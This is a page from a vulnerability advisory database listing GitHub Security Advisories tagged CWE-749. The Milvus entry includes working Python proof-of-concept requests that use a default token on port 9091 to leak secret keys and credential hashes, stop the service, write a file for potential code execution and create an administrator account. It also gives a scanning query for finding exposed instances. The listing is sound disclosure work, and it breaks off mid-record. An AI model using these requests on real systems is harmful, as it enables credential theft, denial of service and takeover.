CWE-749
AllowedExposed Dangerous Method or Function
Abstraction: Base · Status: Incomplete
The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
304 vulnerabilities reference this CWE, most recent first.
GHSA-7JPC-WCV3-H3MC
Vulnerability from github – Published: 2022-05-24 17:03 – Updated: 2024-01-09 12:30A vulnerability has been identified in SiNVR 3 Central Control Server (CCS) (all versions), SiNVR 3 Video Server (all versions). The SFTP service (default port 22/tcp) of the SiNVR 3 Central Control Server (CCS) does not properly limit its capabilities to the specified purpose. In conjunction with CVE-2019-18341, an unauthenticated remote attacker with network access to the CCS server could exploit this vulnerability to read or delete arbitrary files, or access other resources on the same server.
{
"affected": [],
"aliases": [
"CVE-2019-18342"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-12-12T19:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in SiNVR 3 Central Control Server (CCS) (all versions), SiNVR 3 Video Server (all versions). The SFTP service (default port 22/tcp) of the SiNVR 3 Central Control Server (CCS) does not properly limit its capabilities to the specified purpose. In conjunction with CVE-2019-18341, an unauthenticated remote attacker with network access to the CCS server could exploit this vulnerability to read or delete arbitrary files, or access other resources on the same server.",
"id": "GHSA-7jpc-wcv3-h3mc",
"modified": "2024-01-09T12:30:34Z",
"published": "2022-05-24T17:03:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18342"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-761617.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-761844.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7P43-CH8G-7VXG
Vulnerability from github – Published: 2024-05-03 03:30 – Updated: 2024-05-03 03:30PDF-XChange Editor Net.HTTP.requests Exposed Dangerous Function Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the Net.HTTP.requests method. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of the current user. Was ZDI-CAN-20211.
{
"affected": [],
"aliases": [
"CVE-2023-39505"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-03T03:15:18Z",
"severity": "MODERATE"
},
"details": "PDF-XChange Editor Net.HTTP.requests Exposed Dangerous Function Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the Net.HTTP.requests method. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of the current user. Was ZDI-CAN-20211.",
"id": "GHSA-7p43-ch8g-7vxg",
"modified": "2024-05-03T03:30:58Z",
"published": "2024-05-03T03:30:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39505"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1143"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7PPG-37FH-VCR6
Vulnerability from github – Published: 2026-02-11 19:49 – Updated: 2026-07-06 15:17Summary
Milvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:
- The
/exprdebug endpoint uses a weak, predictable default authentication token derived frometcd.rootPath(default:by-dev), enabling arbitrary expression evaluation. - The full REST API (
/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.
Details
Vulnerability 1: Weak Default Authentication on /expr Endpoint
The /expr endpoint on port 9091 accepts an auth parameter that defaults to the etcd.rootPath value (by-dev). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:
- Information/Credential Disclosure: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via
param.MinioCfg.SecretAccessKey.GetValue(),rootcoord.meta.GetCredential(ctx, 'root'), etc. - Denial of Service: Invoking
proxy.Stop()to shut down the proxy service. - Arbitrary File Write (potential RCE): Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.
Vulnerability 2: Unauthenticated REST API on Metrics Port
Business-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via registerHTTPServer() in internal/distributed/proxy/service.go (line 170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.
An attacker can perform any business operation without credentials, including:
- Creating, listing, and deleting collections
- Inserting and querying data
- Creating, listing, and deleting user credentials
- Modifying user passwords
Proof of Concept
PoC 1 — /expr Endpoint Exploitation
import requests
url = "http://<target>:9091/expr"
# Leak sensitive configuration (e.g., MinIO secret key)
res = requests.get(url, params={
"auth": "by-dev",
"code": "param.MinioCfg.SecretAccessKey.GetValue()"
}, timeout=5)
print(res.json().get("output", ""))
# Retrieve hashed credentials for the root user
res = requests.get(url, params={
"auth": "by-dev",
"code": "rootcoord.meta.GetCredential(ctx, 'root')"
}, timeout=5)
print(res.json().get("output", ""))
# Denial of Service — stop the proxy
res = requests.get(url, params={
"auth": "by-dev",
"code": "proxy.Stop()"
}, timeout=5)
# Arbitrary file write (potential RCE)
for cmd in [
'param.Save("proxy.accessLog.localPath", "/tmp")',
'param.Save("proxy.accessLog.formatters.base.format", "whoami")',
'param.Save("proxy.accessLog.filename", "evil.sh")',
'querycoord.etcdCli.KV.Put(ctx, "by-dev/config/proxy/accessLog/enable", "true")'
]:
requests.get(url, params={"auth": "by-dev", "code": cmd}, timeout=5)
PoC 2 — Unauthenticated REST API Access
import requests
target_url = "http://<target>:9091"
# Create a user without any authentication
res = requests.post(f"{target_url}/api/v1/credential", json={
"username": "attacker_user",
"password": "MTIzNDU2Nzg5",
})
print(res.json())
# List all users
res = requests.get(f"{target_url}/api/v1/credential/users")
print(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}
# Create and delete collections, insert data — all without authentication
Internet Exposure
A significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:
http.body="404 page not found" && port="9091"
This indicates the vulnerability is actively exploitable in real-world production environments.
Impact
An unauthenticated remote attacker with network access to port 9091 can:
- Exfiltrate secrets and credentials — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.
- Manipulate all data — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.
- Manage user accounts — Create administrative users, reset passwords, and escalate privileges.
- Cause denial of service — Shut down proxy services, drop databases, or corrupt metadata.
- Write arbitrary files — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.
Remediation
Recommended Fixes
- Remove or disable the
/exprendpoint in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default. - Do not register business API routes on the metrics port. Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.
- Bind port 9091 to localhost by default (
127.0.0.1:9091) so it is not externally accessible unless explicitly configured. - Enforce authentication on all API endpoints, regardless of which port they are served on.
User Mitigations (until patched)
- Block external access to port 9091 using firewall rules or network policies.
- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.
- Change the
etcd.rootPathfrom the default valueby-devto a strong, random value (partial mitigation only — does not address the unauthenticated REST API).
Credit
This vulnerability was discovered and responsibly reported by YingLin Xie (xieyinglin@hust.edu.cn). It was independently reported by 0x1f and zznQ (ac0d3r).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/milvus-io/milvus"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.27"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/milvus-io/milvus"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26190"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-749",
"CWE-1188"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-11T19:49:44Z",
"nvd_published_at": "2026-02-13T19:17:29Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, \u0027root\u0027)`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 \u2014 `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://\u003ctarget\u003e:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, \u0027root\u0027)\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service \u2014 stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n \u0027param.Save(\"proxy.accessLog.localPath\", \"/tmp\")\u0027,\n \u0027param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")\u0027,\n \u0027param.Save(\"proxy.accessLog.filename\", \"evil.sh\")\u0027,\n \u0027querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")\u0027\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 \u2014 Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://\u003ctarget\u003e:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {\u0027status\u0027: {}, \u0027usernames\u0027: [\u0027root\u0027, \u0027attacker_user\u0027]}\n\n# Create and delete collections, insert data \u2014 all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" \u0026\u0026 port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** \u2014 MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** \u2014 Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** \u2014 Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** \u2014 Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** \u2014 Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only \u2014 does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).",
"id": "GHSA-7ppg-37fh-vcr6",
"modified": "2026-07-06T15:17:07Z",
"published": "2026-02-11T19:49:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6"
},
{
"type": "WEB",
"url": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9"
},
{
"type": "PACKAGE",
"url": "https://github.com/milvus-io/milvus"
},
{
"type": "WEB",
"url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27"
},
{
"type": "WEB",
"url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise"
}
GHSA-7QWV-CWGJ-C8RJ
Vulnerability from github – Published: 2022-05-01 06:50 – Updated: 2025-10-22 19:30ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "struts:struts"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2006-1547"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-07T23:11:14Z",
"nvd_published_at": "2006-03-30T22:02:00Z",
"severity": "HIGH"
},
"details": "ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.",
"id": "GHSA-7qwv-cwgj-c8rj",
"modified": "2025-10-22T19:30:57Z",
"published": "2022-05-01T06:50:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-1547"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25613"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/struts"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2006-1547"
},
{
"type": "WEB",
"url": "http://issues.apache.org/bugzilla/show_bug.cgi?id=38534"
},
{
"type": "WEB",
"url": "http://lists.suse.com/archive/suse-security-announce/2006-May/0004.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/19493"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/20117"
},
{
"type": "WEB",
"url": "http://securitytracker.com/id?1015856"
},
{
"type": "WEB",
"url": "http://struts.apache.org/struts-doc-1.2.9/userGuide/release-notes.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Input Validation in Apache Struts"
}
GHSA-7R5Q-4QGX-V545
Vulnerability from github – Published: 2025-01-14 15:40 – Updated: 2025-05-21 14:12Problem
A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.
Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:
- the user opens a malicious link, such as one sent via email.
- the user visits a compromised or manipulated website while the following settings are misconfigured:
security.backend.enforceReferrerfeature is disabled,BE/cookieSameSiteconfiguration is set tolaxornone
The vulnerability in the affected downstream component “Indexed Search Module” allows attackers to delete items of the component.
Solution
Update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.
Credits
Thanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias Häußler who fixed the issue.
References
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.4.47"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-indexed-search"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.4.48"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.5.41"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-indexed-search"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.5.42"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.4.24"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-indexed-search"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.4.25"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 13.4.2"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-indexed-search"
},
"ranges": [
{
"events": [
{
"introduced": "13.0.0"
},
{
"fixed": "13.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-55923"
],
"database_specific": {
"cwe_ids": [
"CWE-352",
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-14T15:40:59Z",
"nvd_published_at": "2025-01-14T20:15:30Z",
"severity": "MODERATE"
},
"details": "### Problem\nA vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.\n\nSuccessful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:\n\n* the user opens a malicious link, such as one sent via email.\n* the user visits a compromised or manipulated website while the following settings are misconfigured:\n + `security.backend.enforceReferrer` feature is disabled,\n + `BE/cookieSameSite` configuration is set to `lax` or `none`\n\nThe vulnerability in the affected downstream component \u201cIndexed Search Module\u201d allows attackers to delete items of the component.\n\n### Solution\nUpdate to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.\n\n### Credits\nThanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias H\u00e4u\u00dfler who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2025-008](https://typo3.org/security/advisory/typo3-core-sa-2025-008)",
"id": "GHSA-7r5q-4qgx-v545",
"modified": "2025-05-21T14:12:05Z",
"published": "2025-01-14T15:40:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-7r5q-4qgx-v545"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55923"
},
{
"type": "WEB",
"url": "https://github.com/TYPO3-CMS/indexed_search/commit/cfda3f1edeea3c50034bce5c25393e297408c2b4"
},
{
"type": "PACKAGE",
"url": "https://github.com/TYPO3-CMS/indexed_search"
},
{
"type": "WEB",
"url": "https://typo3.org/security/advisory/typo3-core-sa-2025-008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "TYPO3 Indexed Search Module vulnerable to Cross-Site Request Forgery"
}
GHSA-7RHJ-W7PG-37V4
Vulnerability from github – Published: 2026-05-13 21:32 – Updated: 2026-05-13 21:32Exposed Keycloak management service in the Arqit Symmetric Key Agreement Platform enables unauthorized access to sensitive debug information such as metrics and health data. This issue affects Symmetric Key Agreement Platform: before 26.03.
{
"affected": [],
"aliases": [
"CVE-2026-33584"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-13T19:17:07Z",
"severity": "MODERATE"
},
"details": "Exposed Keycloak management \nservice in the Arqit Symmetric Key Agreement Platform enables unauthorized access to sensitive debug \ninformation such as metrics and\n health data.\u00a0This issue affects Symmetric Key Agreement Platform: before 26.03.",
"id": "GHSA-7rhj-w7pg-37v4",
"modified": "2026-05-13T21:32:05Z",
"published": "2026-05-13T21:32:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33584"
},
{
"type": "WEB",
"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33584"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7V9X-7R25-H768
Vulnerability from github – Published: 2023-07-20 00:30 – Updated: 2024-04-04 06:17?In Keysight Geolocation Server v2.4.2 and prior, a low privileged attacker could create a local ZIP file containing a malicious script in any location. The attacker could abuse this to load a DLL with SYSTEM privileges.
{
"affected": [],
"aliases": [
"CVE-2023-36853"
],
"database_specific": {
"cwe_ids": [
"CWE-427",
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-19T22:15:11Z",
"severity": "HIGH"
},
"details": "\n\n\n\n\n?In Keysight Geolocation Server v2.4.2 and prior, a low privileged attacker could create a local ZIP file containing a malicious script in any location. The attacker could abuse this to load a DLL with SYSTEM privileges.\n\n\n\n\n\n\n\n\n\n\n\n",
"id": "GHSA-7v9x-7r25-h768",
"modified": "2024-04-04T06:17:24Z",
"published": "2023-07-20T00:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36853"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-199-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-82QR-X7HV-JW32
Vulnerability from github – Published: 2026-02-02 18:31 – Updated: 2026-02-02 18:31Cryptographic issue when a Trusted Zone with outdated code is triggered by a HLOS providing incorrect input.
{
"affected": [],
"aliases": [
"CVE-2025-47366"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-02T16:16:19Z",
"severity": "HIGH"
},
"details": "Cryptographic issue when a Trusted Zone with outdated code is triggered by a HLOS providing incorrect input.",
"id": "GHSA-82qr-x7hv-jw32",
"modified": "2026-02-02T18:31:32Z",
"published": "2026-02-02T18:31:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47366"
},
{
"type": "WEB",
"url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/february-2026-bulletin.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8692-G6G9-GM5P
Vulnerability from github – Published: 2023-03-03 22:52 – Updated: 2023-03-03 22:52Impact
org.xwiki.store.script.TemporaryAttachmentsScriptService#uploadTemporaryAttachment is returning an instance of com.xpn.xwiki.doc.XWikiAttachment. This class is not supported to be exposed to users without the programing right.
com.xpn.xwiki.api.Attachment should be used instead and takes case of checking the user's rights before performing dangerous operations.
Patches
This has been patched in the version 14.9-rc-1 and 14.4.6.
Workarounds
There's no workaround for this issue.
References
https://jira.xwiki.org/browse/XWIKI-20180
For more information
If you have any questions or comments about this advisory:
- Open an issue in JIRA
- Email us at security ML
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-store-filesystem-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "14.3-rc-1"
},
{
"fixed": "14.4.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-store-filesystem-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "14.5"
},
{
"fixed": "14.9-rc-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-26478"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-03T22:52:47Z",
"nvd_published_at": "2023-03-02T18:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\n`org.xwiki.store.script.TemporaryAttachmentsScriptService#uploadTemporaryAttachment` is returning an instance of `com.xpn.xwiki.doc.XWikiAttachment`. This class is not supported to be exposed to users without the `programing` right.\n`com.xpn.xwiki.api.Attachment` should be used instead and takes case of checking the user\u0027s rights before performing dangerous operations.\n\n### Patches\nThis has been patched in the version 14.9-rc-1 and 14.4.6.\n\n### Workarounds\nThere\u0027s no workaround for this issue.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-20180\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [JIRA](https://jira.xwiki.org/)\n* Email us at [security ML](mailto:security@xwiki.org)\n",
"id": "GHSA-8692-g6g9-gm5p",
"modified": "2023-03-03T22:52:47Z",
"published": "2023-03-03T22:52:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8692-g6g9-gm5p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26478"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/3c73c59e39b6436b1074d8834cf276916010014d"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20180"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "xwiki contains Exposed Dangerous Method or Function"
}
GHSA-8787-63PX-3M23
Vulnerability from github – Published: 2022-05-13 01:54 – Updated: 2023-02-08 18:08It was found that cobbler 2.6.x exposed all functions from its CobblerXMLRPCInterface class over XMLRPC. A remote, unauthenticated attacker could use this flaw to gain high privileges within cobbler, upload files to arbitrary location in the context of the daemon.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "cobbler"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "3.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-10931"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2023-02-08T18:08:11Z",
"nvd_published_at": "2018-08-09T20:29:00Z",
"severity": "CRITICAL"
},
"details": "It was found that cobbler 2.6.x exposed all functions from its CobblerXMLRPCInterface class over XMLRPC. A remote, unauthenticated attacker could use this flaw to gain high privileges within cobbler, upload files to arbitrary location in the context of the daemon.",
"id": "GHSA-8787-63px-3m23",
"modified": "2023-02-08T18:08:11Z",
"published": "2022-05-13T01:54:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10931"
},
{
"type": "WEB",
"url": "https://github.com/cobbler/cobbler/issues/1916"
},
{
"type": "WEB",
"url": "https://github.com/cobbler/cobbler/pull/1921"
},
{
"type": "WEB",
"url": "https://github.com/cobbler/cobbler/commit/1b91a3d3ac87c31d9dac2307513feb2aa49620a6"
},
{
